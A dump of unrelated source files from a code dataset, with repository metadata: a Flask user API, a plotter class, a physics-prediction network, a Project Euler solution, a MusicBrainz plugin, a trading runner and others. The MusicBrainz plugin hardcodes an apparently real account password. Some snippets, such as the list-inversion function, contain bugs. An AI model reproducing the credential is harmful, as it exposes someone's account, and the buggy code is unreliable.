    # RGB frames and their matching depth frames (index-aligned lists).
    image_names = dm.carga_imagenes(os.path.join(path_test, 'rgb'))
    image_names_d = dm.carga_imagenes(os.path.join(path_test, 'd'))
    pred = []      # predicted distance, one entry per detection
    target = []    # depth-derived target distance
    img_nm = []    # source image path for each detection
    img_idx = []   # 1-based frame index for each detection
    media = []     # mean of the depth crop
    q1 = []        # first quartile of the depth crop
    q3 = []        # third quartile of the depth crop
    i = 0
    percentage_print = 0
    k_filter = kalman.kalman_filter()
    for image_name in image_names:
        #img_rgb = cv2.imread(image_name,-1)
        #img_rgb_cal = calibrate_images(img_rgb.copy(), True, opt)
        ret = detector.run(image_name)
        im = image_name
        imd = image_names_d[i]
        i = i + 1
        percentage = int(i*100/len(image_names))
        # Print a textual progress bar (one '|' per 2.5% completed).
        if percentage >= percentage_print:
            string = "["
            for x in range(int(100/2.5)):
                if x <= int(percentage/2.5):
                    string = string + "|"
                else:
                    string = string + "-"
            string = string + "] "
            print(string + str(percentage) + '%')
            percentage_print = percentage_print + 2.5
        p, t, m, q, qq = eval_total(ret, im, imd, i, opt, path_save, k_filter)
        # Flatten the per-frame lists into global per-detection lists; the
        # image name/index are repeated once per detection so every column of
        # the final DataFrame ends up with the same length.
        for pp in p:
            pred.append(pp)
        for tt in t:
            target.append(tt)
            img_nm.append(im)
            img_idx.append(i)
        for mm in m:
            media.append(mm)
        for q11 in q:
            q1.append(q11)
        for q33 in qq:
            q3.append(q33)
    print("Analisis completado...")
    data = {'Prediction': pred, 'Target': target, 'Media': media, 'Q1': q1, 'Q3': q3, 'Img_index': img_idx, 'Img_name': img_nm}
    df = pd.DataFrame(data)
    df.to_excel(os.path.join(path_dataset, 'debug_data.xlsx'))
    print("Archivo creado")
if __name__ == '__main__':
opt = opts().init()
debug(opt)
| [
"grobled0@hotmail.com"
] | grobled0@hotmail.com |
b19a3f67cbb8d044b2a5ea9cd8fbb25fe0f96ee7 | 1ec3811f4cafe29f9165f78d059a192ec05a03e1 | /app/main/controller/user_controller.py | 848bc1d4bda58756eba8ea81b7656adda60a7b39 | [] | no_license | IcySkype/FlaskRestPlus | 87f964fecc428ace90b99b471e9608f24ac5fd46 | 2db2faf68d6b9c71907bf2b5cbcbbe932f4331ac | refs/heads/master | 2020-04-28T10:12:47.540299 | 2019-03-13T03:11:52 | 2019-03-13T03:11:52 | 175,193,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | from flask import request
from flask_restplus import Resource
from ..util.dto import UserDto
from ..service.user_service import save_new_user, get_all_users, get_a_user
# Shorthand handles: the users API namespace and its serialization model.
api = UserDto.api
_user = UserDto.user
@api.route('/')
class UserList(Resource):
    """Collection endpoint for users: list them all, or register a new one."""

    @api.doc('list_of_registered_users')
    @api.marshal_list_with(_user, envelope='data')
    def get(self):
        # Return every registered user, marshalled under a 'data' envelope.
        return get_all_users()

    @api.response(201, 'User successfully created.')
    @api.doc('create a new user')
    @api.expect(_user, validate=True)
    def post(self):
        # Create a new user from the request JSON (validated against _user).
        data = request.json
        return save_new_user(data=data)
@api.route('/<public_id>')
@api.param('public_id', 'The User identifier')
@api.response(404, 'User not found.')
class User(Resource):
    """Item endpoint: fetch a single user by its public id."""

    @api.doc('get a user')
    # NOTE(review): marshal_list_with wraps the single user in a list;
    # marshal_with may have been intended here -- confirm with API consumers.
    @api.marshal_list_with(_user)
    def get(self, public_id):
        # Abort with 404 when the public id is unknown.
        user = get_a_user(public_id)
        if not user:
            api.abort(404)
        else:
            return user
"skytrizero@gmail.com"
] | skytrizero@gmail.com |
21b67cd73c3425afe749638e23831431e4628084 | 0f07107b016d2aee64788966b9f0d322ac46b998 | /moya/docgen/theme.py | 39c3d707e1310f7b2799f5a59c83826bd99563b2 | [
"MIT"
] | permissive | fkztw/moya | 35f48cdc5d5723b04c671947099b0b1af1c7cc7a | 78b91d87b4519f91dfdd2b40dab44e72f201a843 | refs/heads/master | 2023-08-09T09:20:21.968908 | 2019-02-03T18:18:54 | 2019-02-03T18:18:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,610 | py | from .. import iniparse
from fs.path import dirname, pathjoin
class Page(object):
    """A themed page: a document class paired with its ini-file settings."""

    def __init__(self, doc_class, settings):
        self.doc_class = doc_class
        self.settings = settings

    def __repr__(self):
        return "Page({!r}, {!r})".format(self.doc_class, self.settings)

    def get(self, context, settings_name):
        """Return the named setting (or "") substituted through *context*."""
        raw_value = self.settings.get(settings_name, "")
        return context.sub(raw_value)

    def get_path(self, context):
        """Return this page's 'path' setting substituted through *context*."""
        raw_value = self.settings.get("path", "")
        return context.sub(raw_value)
class Theme(object):
    """A documentation theme loaded from a filesystem's ``theme.ini``."""

    def __init__(self, fs):
        # fs: a filesystem object exposing open()/getsyspath() (PyFilesystem-style)
        self.fs = fs
        self.cfg = None
        self.theme_settings = None
        self.pages = []
        self.read()

    def get(self, section_name, key, default=None):
        """Return ``cfg[section_name][key]``, or *default* if section or key is missing."""
        section = self.cfg.get(section_name, None)
        if section is None:
            return default
        return section.get(key, default)

    def read(self):
        """Parse theme.ini, caching the [theme] section and all [page:*] pages."""
        with self.fs.open("theme.ini", "rb") as settings_file:
            cfg = iniparse.parse(settings_file)
        self.cfg = cfg
        self.theme_settings = cfg.get("theme", {})
        for section, settings in cfg.items():
            # sections named "page:<doc_class>" declare a themed page
            what, _, name = section.partition(":")
            if what == "page":
                page = Page(name, settings)
                self.pages.append(page)

    def get_pages(self, doc):
        """Yield every configured page whose doc_class matches *doc*'s."""
        doc_class = doc.doc_class
        for page in self.pages:
            if page.doc_class == doc_class:
                yield page

    def get_relative_path(self, path):
        """Resolve *path* relative to the directory containing theme.ini."""
        ini_path = dirname(self.fs.getsyspath("theme.ini"))
        path = pathjoin(ini_path, path)
        return path
| [
"willmcgugan@gmail.com"
] | willmcgugan@gmail.com |
ca2a6787fbbbc2183e4852f837cd9b38f57a2152 | ca1182f1b43126bc55736725ae9219f30aec6d84 | /venv/bin/pip3.6 | 7b2bdc1104d2f79da1bb4837699daf22ae6ec0ad | [] | no_license | jesusCDev/Instagram-Bot-With-Selenium | c1501865d9b4563cde39beeffd0bbac2727fe46b | b19ad8f276b74f38b0fa51dc771385dd56e80f10 | refs/heads/master | 2022-04-08T15:36:09.917401 | 2020-01-03T01:35:35 | 2020-01-03T01:35:35 | 104,346,246 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 433 | 6 | #!/home/jesuscdev/Programming/Pycharm/InstagramBot-With-Selenium/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.6'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.6')()
)
| [
"jesuscdev@gmail.com"
] | jesuscdev@gmail.com |
a291c9eac13c4ace0db60d7b2a34622f71668b2c | ad7c11f673c290eeb2fa8e3a97c06878553d0035 | /plotterWsvgPreview.py | 24fd751e6305cd868e80d9a820c4f0f09f4b227f | [] | no_license | jefftrevino/sol118 | c05a1cc26facfa31cb0fc19de8de26bbc1a11464 | 82c0e463e74d4aca3edcce8d9e3dd4c38141d051 | refs/heads/master | 2021-01-12T06:21:21.485247 | 2017-01-10T01:10:24 | 2017-01-10T01:10:24 | 77,346,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,365 | py | import svgwrite
from matplotlib import pyplot
from shapely.geometry import Polygon, LineString
from shapely.affinity import scale, rotate
from chiplotle import (
hpgl,
instantiate_plotters
)
class Drawing:
    """Accumulates shapely geometries and renders them either to an SVG
    preview file or to an HPGL pen plotter (via chiplotle)."""

    def __init__(self, geoms=None):
        self.geoms = geoms or []
        self.scale_ratio = 1  # applied to every geometry added via add()
        self.get_bounds()
        self.svg = svgwrite.Drawing(
            filename="preview.svg",
            size=("2560px", "1600px")
        )
        self.svg.viewbox(
            width=self.width,
            height=self.height,
        )
        self.add_bounds_preview()
        self.plotter = None  # lazily instantiated on first plot()
        # self.scale_ratio = self.height / 1000
        #self.scale_ratio = 2.8

    def plot(self, geom=None):
        """Send all stored geometries (plus *geom*, if given) to the plotter."""
        if not self.plotter:
            plotters = instantiate_plotters()
            self.plotter = plotters[0]  # assumes at least one plotter is connected
        if geom:
            self.add(geom)
        for geom in self.geoms:
            self.plot_geom(geom)

    def add(self, geom):
        """Store *geom*, scaled by scale_ratio about the origin."""
        self.geoms.append(self.scale_to_fit(geom))

    def plot_geom(self, geom):
        """Recursively plot a shapely geometry (line, polygon or collection)."""
        if hasattr(geom, 'coords'):
            # assume it is a linear ring or linestring
            self.plot_coords([coord for coord in geom.coords])
        elif hasattr(geom, 'exterior'):
            # assume it has a Polygon-like interface
            self.plot_geom(geom.exterior)
            for ring in geom.interiors:
                self.plot_geom(ring)
        elif hasattr(geom, 'geoms'):
            # assume this is a collection of objects
            for geom in geom.geoms:
                self.plot_geom(geom)
        else:
            raise NotImplementedError(
                "I don't know how to plot {}".format(type(geom)))

    def preview(self, geom=None, filename="preview.svg"):
        """Render all stored geometries into the SVG preview and save it.

        NOTE(review): *filename* is accepted but never used -- the drawing is
        always written to the name given at construction time.
        """
        if geom:
            self.add(geom)
        for geom in self.geoms:
            self.preview_geom(geom)
        print(self.svg.tostring())
        self.svg.save()

    def preview_geom(self, geom, **kwargs):
        """Recursively add a geometry to the SVG preview."""
        if hasattr(geom, 'xy'):
            # assume it is a linear ring or linestring
            # NOTE(review): the guard tests 'xy' but the body reads .coords,
            # while plot_geom tests 'coords' -- confirm which is intended.
            line_points = geom.coords
            x_offset = self.width/2
            y_offset = self.height/2
            # shift to SVG coordinates (origin at top-left, y axis flipped)
            line_points = [
                (x[0]+x_offset, x[1]*-1 + y_offset)
                for x in line_points]
            self.svg.add(self.svg.polyline(
                points=line_points,
                stroke_width="5",
                fill="rgb(255,255,255)",
                stroke="black",)
            )
        elif hasattr(geom, 'exterior'):
            # assume it has a Polygon-like interface
            self.preview_geom(geom.exterior, **kwargs)
            for ring in geom.interiors:
                self.preview_geom(ring, **kwargs)
        elif hasattr(geom, 'geoms'):
            # assume this is a collection of objects
            for geom in geom.geoms:
                self.preview_geom(geom, **kwargs)
        else:
            raise NotImplementedError(
                "I don't know how to preview {}".format(type(geom)))

    def get_bounds(self):
        """Define the plotter's drawable area (HPGL units) and its width/height."""
        self.bounds_poly = Polygon([
            (-11640, -8640),
            (-11640, 8640),
            (10720, 8640),
            (10720, -8640),
            (-11640, -8640),
        ])
        self.bounds = self.bounds_poly.bounds
        self.width = 11640 + 10720
        self.height = 8640 * 2

    def add_bounds_preview(self):
        """Draw the plotter bounds as a white stroked rectangle in the preview."""
        width_string = str(self.width)
        height_string = str(self.height)
        self.svg.add(self.svg.rect(
            insert=(0, 0),
            size=(width_string+"px", height_string+"px"),
            stroke_width="100",
            stroke="black",
            fill="rgb(255,255,255)",
        ))

    def plot_coords(self, coords):
        """Plot a coordinate list: pen-up to the start, pen-down along the path
        in chunks of 300 points (presumably to respect the plotter's command
        buffer -- TODO confirm), then pen-up at the end."""
        start = hpgl.PU([coords[0]])
        self.plotter.write(start)
        threshold = 300
        while len(coords) > threshold:
            command = hpgl.PD(coords[:threshold])
            self.plotter.write(command)
            coords = coords[threshold:]
        command = hpgl.PD(coords)
        self.plotter.write(command)
        end = hpgl.PU([coords[-1]])
        self.plotter.write(end)

    def scale_to_fit(self, geom):
        """Return *geom* scaled by scale_ratio about the origin."""
        return scale(
            geom,
            xfact=self.scale_ratio,
            yfact=self.scale_ratio,
            origin=(0.0, 0.0),
        )
| [
"jeffrey.trevino@gmail.com"
] | jeffrey.trevino@gmail.com |
e14f43ea5025e2ed22934b1c5b74a03a9f91f38d | 579e3d7310f8b25afc694f647a0b7e5e91329a21 | /neuralphys/models/rpin.py | 2973633e11850b4a073d8f64dcf96c818d3d5c61 | [] | no_license | Alexadlu/RPIN | cd3514312410e4386ed12f435f1c0300e054fb21 | eebb8f64a1dd566585566e378ffb05aa5616ae18 | refs/heads/master | 2022-11-26T22:29:43.849778 | 2020-08-06T01:19:38 | 2020-08-06T01:19:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,098 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision.ops.roi_align import RoIAlign
from neuralphys.utils.config import _C as C
from neuralphys.models.layers.IN import InterNet
from neuralphys.models.backbones.build import build_backbone
class Net(nn.Module):
    """RPIN-style network: a visual backbone, per-object RoI features, and a
    bank of interaction networks that roll object states forward in time and
    decode per-object box predictions."""

    def __init__(self):
        super(Net, self).__init__()
        self.input_time_step = C.RPIN.INPUT_SIZE
        self.ve_feat_dim = C.RPIN.VE_FEAT_DIM  # visual encoder feature dimension
        self.in_feat_dim = C.RPIN.IN_FEAT_DIM  # interaction net feature dimension
        self.num_objs = C.RPIN.NUM_OBJS
        self.po_feat_dim = (
            self.in_feat_dim if C.RPIN.COOR_FEATURE_EMBEDDING or C.RPIN.COOR_FEATURE_SINUSOID else 2
        ) if C.RPIN.COOR_FEATURE else 0  # position feature dimension
        # build image encoder
        self.backbone = build_backbone(C.RPIN.BACKBONE, self.ve_feat_dim)
        if C.RPIN.IMAGE_UP:
            self.blur_conv = nn.Conv2d(self.ve_feat_dim, self.ve_feat_dim, kernel_size=3, padding=1)
        # extract object feature
        pool_size = C.RPIN.ROI_POOL_SIZE
        # RoIAlign maps box coords onto the feature map: 1/2 scale when the
        # feature map is upsampled, else 1/4
        spatial_scale = 1.0 / 2.0 if C.RPIN.IMAGE_UP else 1.0 / 4.0
        self.roi_align = RoIAlign((pool_size, pool_size), spatial_scale=spatial_scale, sampling_ratio=1)
        self.fc0 = nn.Linear(self.ve_feat_dim * pool_size * pool_size, self.in_feat_dim)
        # coordinate features
        if C.RPIN.COOR_FEATURE:
            if C.RPIN.COOR_FEATURE_EMBEDDING:
                self.fc0_coor = nn.Linear(2, self.in_feat_dim)
                self.fc1_coor = nn.Linear(self.in_feat_dim, self.in_feat_dim)
            self.red_coor = nn.Linear(self.in_feat_dim + self.po_feat_dim, self.in_feat_dim)
        # interaction networks
        self.temporal_input = 4  # number of history steps fed to the INs
        self._init_interaction_net()
        self.decoder_output = 4  # per-object size of each decoded state/bbox
        self.aggregator = nn.Linear(self.in_feat_dim * self.temporal_input, self.in_feat_dim)
        self.state_decoder = nn.Linear(self.in_feat_dim, self.decoder_output)

    def _init_interaction_net(self):
        """Create one InterNet per history time step."""
        # interaction network
        graph = []
        for i in range(self.temporal_input):
            graph.append(InterNet(self.in_feat_dim))
        self.graph = nn.ModuleList(graph)

    def forward(self, x, rois, src_coor_features=None, num_rollouts=8, data_pred=None, phase=None, ignore_idx=None):
        """Roll object states forward *num_rollouts* steps and decode boxes.

        x: (b, t, c, h, w) input frames; rois: boxes with num_objs at dim 2.
        Returns {'bbox': tensor reshaped to (-1, num_rollouts, num_objs, 4)}.
        data_pred and phase are accepted but unused here.
        """
        self.num_objs = rois.shape[2]
        # x: (b, t, c, h, w)
        # reshape time to batch dimension
        time_step = x.shape[1]
        assert self.input_time_step == time_step
        # threshold, used for conditional IN computation
        # (mean half-extent of each object's box, averaged over time)
        r = ((rois[..., 4] - rois[..., 2]) / 2 + (rois[..., 3] - rois[..., 1]) / 2) / 2
        r = r.mean(1).detach()
        x = self.extract_object_feature(x, rois)
        # coordinate feature, provided as input
        if C.RPIN.COOR_FEATURE:
            coor_features = src_coor_features[:, :time_step]
            x = self.attach_position_embedding(x, coor_features)
        bbox_rollout = []
        # sliding window over the last 4 object states / coordinates
        state_list = [x[:, 0], x[:, 1], x[:, 2], x[:, 3]]
        coor_list = [src_coor_features[:, 0], src_coor_features[:, 1], src_coor_features[:, 2], src_coor_features[:, 3]]
        for i in range(num_rollouts):
            c1 = self.graph[0](state_list[0], coor_list[0], r, ignore_idx)
            c2 = self.graph[1](state_list[1], coor_list[1], r, ignore_idx)
            c3 = self.graph[2](state_list[2], coor_list[2], r, ignore_idx)
            c4 = self.graph[3](state_list[3], coor_list[3], r, ignore_idx)
            all_c = torch.cat([c1, c2, c3, c4], 2)
            s = self.aggregator(all_c)
            bbox = self.state_decoder(s)
            bbox_rollout.append(bbox)
            # advance the window: drop the oldest state, append the new one
            state_list = state_list[1:] + [s]
            coor_list = coor_list[1:] + [bbox[..., 2:]]
        # (num_rollouts, b, num_objs, 4) -> (b, num_rollouts, num_objs, 4)
        bbox_rollout = torch.stack(bbox_rollout).permute(1, 0, 2, 3)
        bbox_rollout = bbox_rollout.reshape(-1, num_rollouts, self.num_objs, self.decoder_output)
        outputs = {
            'bbox': bbox_rollout
        }
        return outputs

    def attach_position_embedding(self, x, coor_features):
        """Concatenate (optionally MLP-embedded) coordinate features onto the
        object features and project back down to in_feat_dim."""
        emb_features = coor_features
        if C.RPIN.COOR_FEATURE_EMBEDDING:
            emb_features = F.relu(self.fc0_coor(emb_features))
            emb_features = F.relu(self.fc1_coor(emb_features))
        x = torch.cat([x, emb_features], dim=-1)
        x = F.relu(self.red_coor(x))
        return x

    def extract_object_feature(self, x, rois):
        """RoI-align per-object features from the backbone feature map.

        Returns a tensor of shape (b, t, num_objs, in_feat_dim).
        """
        # visual feature, comes from RoI Pooling
        batch_size, time_step = x.shape[0], x.shape[1]
        x = x.reshape((batch_size * time_step,) + x.shape[2:])  # (b x t, c, h, w)
        x = self.backbone(x)
        if C.RPIN.IMAGE_UP:
            x = F.interpolate(x, scale_factor=2)
            x = F.relu(self.blur_conv(x))  # (batch x time, c, h, w)
        roi_pool = self.roi_align(x, rois.reshape(-1, 5))  # (b * t * num_objs, feat_dim)
        roi_pool = roi_pool.reshape(batch_size, time_step, self.num_objs, -1)
        x = F.relu(self.fc0(roi_pool))  # (b, t, num_obj, feat_dim)
        return x
| [
"macshqi@gmail.com"
] | macshqi@gmail.com |
f13a77c853df1627ee0607c358aa576706d35efe | 1760630328334270695d88596332d6b7be25def9 | /solutions/005_smallest_multiple/smallest_multiple.py | 03233411c9b01b846833f4359232ca520ca2869a | [] | no_license | ZekeMiller/euler-solutions | 1320aea8ebcde9f9ca0b971086820f8b4591f6bc | 472e9609cea9b87642ca90bf58dcd1361ddfd736 | refs/heads/master | 2021-06-02T20:45:15.248518 | 2019-11-12T20:49:28 | 2019-11-12T20:49:28 | 131,333,138 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | from functools import reduce
from operator import mul
def genPrimes(max):
    """Return the list of primes below *max*, always seeded with 2.

    Uses trial division against the primes found so far; only odd candidates
    are tested.  NOTE: the parameter intentionally keeps its original name
    (which shadows the builtin ``max``) for interface compatibility.
    """
    primes = [2]
    for candidate in range(3, max, 2):
        # candidate is prime iff no smaller prime divides it
        if all(candidate % p for p in primes):
            primes.append(candidate)
    return primes
def lcm(vals):
    """Return the least common multiple of the numbers in *vals*.

    The previous prime-power bookkeeping mutated ``result`` while iterating
    it (skipping elements) and only special-cased squares and powers of two,
    so it was only correct for inputs like 1..20 (e.g. it returned 15 for
    [4, 6]).  Folding the gcd-based pairwise lcm over the values is correct
    for any sequence of non-negative integers; an empty sequence yields 1.
    """
    from math import gcd  # local import keeps the module's top-level imports unchanged
    return reduce(lambda a, b: a * b // gcd(a, b), vals, 1)
# Project Euler #5: smallest positive number evenly divisible by all of 1..20.
vals = [ i for i in range( 1, 21 ) ]
print( lcm( vals ) )
| [
"zfm6866@rit.edu"
] | zfm6866@rit.edu |
08af56622c50f5c76d675410fd3e23b7fb5c8bca | b401baaea0bd296a4ee7aa7acb6d054ea5bc93cc | /babyjesus/babyjesus/wsgi.py | ee247676f00f013423c8aa79f1f91e75bf762561 | [] | no_license | Adamhunter108/aliases | 4ff6f060c3b4020d1097ec3f8e854e3e6ce29925 | abaca4e87a163d8a68989b2d767042d3da0fdc7d | refs/heads/main | 2023-08-27T02:22:34.146353 | 2021-10-11T21:21:20 | 2021-10-11T21:21:20 | 367,797,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
WSGI config for babyjesus project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at this project's settings module before creating the app.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "babyjesus.settings")
application = get_wsgi_application()  # the WSGI callable served by the web server
| [
"61752774+Adamhunter108@users.noreply.github.com"
] | 61752774+Adamhunter108@users.noreply.github.com |
6da97c918d990c76993a7fb6019a95481f022014 | cf0943d5560b32afe03c551aeb4d71ba7b4fd563 | /catstuff/plugins/musicbrainz/main.py | e006f96e924a21f81943132ad2cc8bb9f1d813c1 | [
"MIT"
] | permissive | modora/catstuff | 96d87a1922d99398ad4dbb7c656ecf90e2e3bf3c | 7a4ea67e26774e42e90d0c71a4b2c299fe506d73 | refs/heads/master | 2021-09-01T09:02:32.896399 | 2017-12-26T05:07:19 | 2017-12-26T05:07:19 | 114,436,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,368 | py | raise NotImplementedError("BROKEN")
import catstuff.core.manager
import os
import musicbrainzngs
default_version = '0.1'
__dir__ = os.path.dirname(os.path.realpath(__file__))
__plugin_file__ = os.path.join(__dir__, "musicbrainz.plugin")
__mod__, __build__, _ = catstuff.core.plugins.import_core(__plugin_file__)
__version__ = catstuff.core.plugins.import_documentation(__plugin_file__).get('Version') or default_version
# SECURITY(review): plaintext credentials committed to source -- move these
# to environment variables or a config file, and rotate the password.
username = 'dersal'
password = '$G0M4KrvG60sFsO7'
class Musicbrainz(catstuff.core.plugins.Collection):
def __init__(self, **kwargs):
super().__init__(__mod__, __build__)
self.version = __version__
musicbrainzngs.set_useragent(app='.'.join(('catstuff', __mod__)),
version=self.version)
defaults = {
"username": '',
"password": '',
'host': 'musicbrainz.org',
'caa_host': 'coverartarchive.org'
}
for (attr, default) in defaults.items():
setattr(self, attr, kwargs.get(attr, default))
def auth(self, username, password):
assert isinstance(username, str)
assert isinstance(password, str)
self.username = username
self.password = password
def main(self, username, password, **kwargs):
self.auth(username, password)
def search(self, service, query='', limit=None, offset=None, strict=False, **fields):
func = {
'annotations': musicbrainzngs.search_annotations,
'areas': musicbrainzngs.search_areas,
'artists': musicbrainzngs.search_artists,
'events': musicbrainzngs.search_events,
'instruments': musicbrainzngs.search_instruments,
'labels': musicbrainzngs.search_labels,
'places': musicbrainzngs.search_places,
'recordings': musicbrainzngs.search_recordings, # songs
'release_groups': musicbrainzngs.search_release_groups,
'releases': musicbrainzngs.search_releases, # albums
'series': musicbrainzngs.search_series,
'works': musicbrainzngs.search_works
}.get(service)
if func is None:
raise NotImplementedError("{} not a search option".format(service))
return func(query=query, limit=limit, offset=offset, strict=strict,
**fields) | [
"swubro@gmail.com"
] | swubro@gmail.com |
9458f3ce00791ddc49646c8c8aa298f325f5846a | 11f7fa68ea8d18ae6ef35e739f092630a3755f60 | /python/list/invetList.py | 05423038078ad59c1ec1a8ba6229fcb243bdd719 | [] | no_license | Edgar3g/date_struct | d064c2d47dc81359d0365d4b3ff12fbcfaa93ead | 00705a1846e21d6ede06ae2fbebdc34d11716f46 | refs/heads/master | 2023-04-25T04:06:58.193313 | 2021-05-06T13:47:30 | 2021-05-06T13:47:30 | 337,095,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | def inverter_lista(lista):
tamanho = len(lista)
limite = tamanho // 2
for i in range(limite):
aux = lista[i]
lista[i] = lista[n - i]
liata[tamanho] = aux
def inverter_lista2(lista):
    """Return a new list with the elements of *lista* in reverse order.

    Fixes the original off-by-one: ``lista[tamanho - i]`` is out of range on
    the first iteration; the mirror index is ``tamanho - 1 - i``.
    """
    nova_lista = []
    tamanho = len(lista)
    for i in range(tamanho):
        nova_lista.append(lista[tamanho - 1 - i])
    return nova_lista
| [
"dikengeofficial@gmail.com"
] | dikengeofficial@gmail.com |
ca8c94fb16c3dcc6a3fee1dfea471e6a033318b8 | 46ee99adf99352b7879c5b2bdbb669f33549cc7c | /runner.py | 7d450ece39fe91252134ce0ec89ba0e639b08c1b | [] | no_license | webclinic017/TBDStructure | d85a01ec04a95a85bb82f2571b5fec898246d9f4 | 9b9b02088c7dcc5786f985dd17292e184b5ce6c2 | refs/heads/main | 2023-03-21T01:21:29.665270 | 2021-02-06T01:28:36 | 2021-02-06T01:28:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,199 | py | import sys
import traceback
from PyQt5.QtWidgets import QApplication
from multiprocessing import Queue, Process
from roboticks.data import DataHandler
from roboticks.portfolio import Portfolio
from roboticks.execution import ExecutionHandler
from db import UserDB, PriceDB
from strategies import STRATEGY
try:
from ebest import ebest_data
except:
print('Ebest import가 실패하였습니다.')
try:
from virtual.virtual_data import VirtualAPI
except:
print('Virtual import가 실패하였습니다')
try:
from kiwoom.realtime import KiwoomRealtimeAPI
except:
print('Kiwoom import가 실패하였습니다.')
class Runner:
    """Wires together the data, portfolio, strategy and execution processes
    for one trading session, driven by per-user strategy settings in the DB."""

    def __init__(self, username: str):
        """
        A strategy that has never been run needs its initial_cap configured,
        whereas a strategy that is already running can be restored from the
        DB.  All strategy-related information (strategy name, initial cap,
        monitor stocks, ...) is managed in the DB.
        """
        print('Starting Runner instance')
        # If the username is not in the DB, register the user through the
        # Django interface first:
        # >> python manage.py createsuperuser
        self.db = UserDB(username)
        self.api_queue = Queue()
        self.port_queue = Queue()
        self.order_queue = Queue()
        self.tmp_queue = Queue()
        self.data_queues = []
        self.source = None  # several strategies may share one source (not the reverse)
        self.initial_cap = {}  # initial capital per strategy
        self.strategies = {}
        self.symbol_list = {}  # symbols tracked per strategy
        self.monitor_stocks = []

    def init_strategy(self, strategy_name: str):
        """
        A strategy not yet stored in the DB needs its initial settings created.
        """
        self.db.set_strategy(strategy_name)
        self.db.get_strategy()  # get_strategy either creates and returns the data, or filters and returns it

    def add_strategy(self, strategy_name: str or list):
        """Register one or more stored strategies and union their universes
        into monitor_stocks.

        NOTE(review): ``str or list`` evaluates to just ``str`` -- it is not a
        union annotation.
        """
        try:
            if type(strategy_name) == str:
                strategy_name = [strategy_name]
            for strategy in strategy_name:
                self.db.set_strategy(strategy)
                st = self.db.get_strategy()
                self.strategies[strategy] = STRATEGY[st['using_strategy']]
                # adding universe
                self.symbol_list[strategy] = list(set(self.db.universe()))
                # adding initial cap
                self.initial_cap[strategy] = st['capital']
                self.data_queues.append(Queue())
            # union of every strategy's universe (order not preserved)
            for st, uni in self.symbol_list.items():
                self.monitor_stocks = list(set(self.monitor_stocks + uni))
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit
            print(f'{strategy_name}은 존재하지 않습니다. STRATEGY 상수를 확인해주시기 바랍니다.')
            print(traceback.format_exc())

    def update_strategy(self, strategy_name, using_strategy=None, source=None, server_type=None, capital=None, currency=None, monitor_stocks=[]):
        """Persist strategy settings and extend its universe in the DB.

        NOTE(review): mutable default ``monitor_stocks=[]`` is shared across calls.
        """
        self.db.set_strategy(strategy_name)
        self.db.save_strategy(using_strategy=using_strategy, source=source, server_type=server_type, capital=capital, currency=currency)
        self.db.add_to_universe(symbol=monitor_stocks)

    def start_trading(self, source: str, date_from: str = None, date_to: str = None, exclude: list = []):
        """
        source: virtual, kiwoom, ebest, crypto
        if source == virtual: date_from is required; if date_to is missing,
        date_to defaults to date_from.

        ``exclude`` exists to make testing possible: it may contain 'data',
        'portfolio', 'execution' and/or 'strategy', and any excluded process
        is simply not started.
        """
        if len(self.strategies) == 0:
            raise Exception('전략 설정을 먼저 하고 실행해주세요. (add_strategy를 실행하여야 합니다.)')
        else:
            # create the data_queues handed over to the Data Handler
            self.data_queues = [Queue() for _ in range(len(self.strategies))]

        if source == 'virtual' and date_from is None:
            raise Exception('Virtual API를 사용하려면 date_from을 yyyy-mm-dd 형식으로 설정하여야 합니다.')
        elif source == 'virtual' and date_to is None:
            date_to = date_from

        # Process Setup
        # STEP #1: Data Handler process
        if 'data' not in exclude:
            dp = Process(target=self._data_handler_process, args=(source,), name='DataHandler')
            dp.start()
            # the child publishes its shared-memory block's identity
            shm_info = self.tmp_queue.get()
            sec_mem_name = shm_info['sec_mem_name']
            sec_mem_shape = shm_info['sec_mem_shape']
            sec_mem_dtype = shm_info['sec_mem_dtype']
        else:
            sec_mem_name, sec_mem_shape, sec_mem_dtype = None, None, None

        # STEP #2: Portfolio process
        if 'portfolio' not in exclude:
            pp = Process(target=self._portfolio_process, args=(sec_mem_name, sec_mem_shape, sec_mem_dtype), name="Portfolio")
            pp.start()

        # STEP #3: Strategy processes
        if 'strategy' not in exclude:
            self._start_strategies(sec_mem_name, sec_mem_shape, sec_mem_dtype, source)

        # STEP #4: Execution process
        if 'execution' not in exclude:
            # NOTE(review): ``server`` is undefined here -- this branch raises
            # NameError unless 'execution' is excluded; confirm the intended value.
            ep = Process(target=self._execution_process, args=(self.port_queue, self.order_queue, server, source), name="ExecutionHandler")
            ep.start()

        # STEP #5: Main thread program (source programs)
        if source == 'virtual':
            self._init_virtual_setup(date_from, date_to)
        elif source == 'kiwoom':
            # NOTE(review): _init_kiwoom_setup/_init_ebest_setup take a required
            # monitor_stocks argument -- these calls raise TypeError as written.
            self._init_kiwoom_setup()
        elif source == 'ebest':
            self._init_ebest_setup()
        elif source == 'crypto':
            self._init_crypto_setup()

    ## Processes
    def _data_handler_process(self, source):
        """
        ``source`` was added because the Data Handler may process data
        differently per source; it could be removed later.
        """
        d = DataHandler(data_queues=self.data_queues, port_queue=self.port_queue, api_queue=self.api_queue,
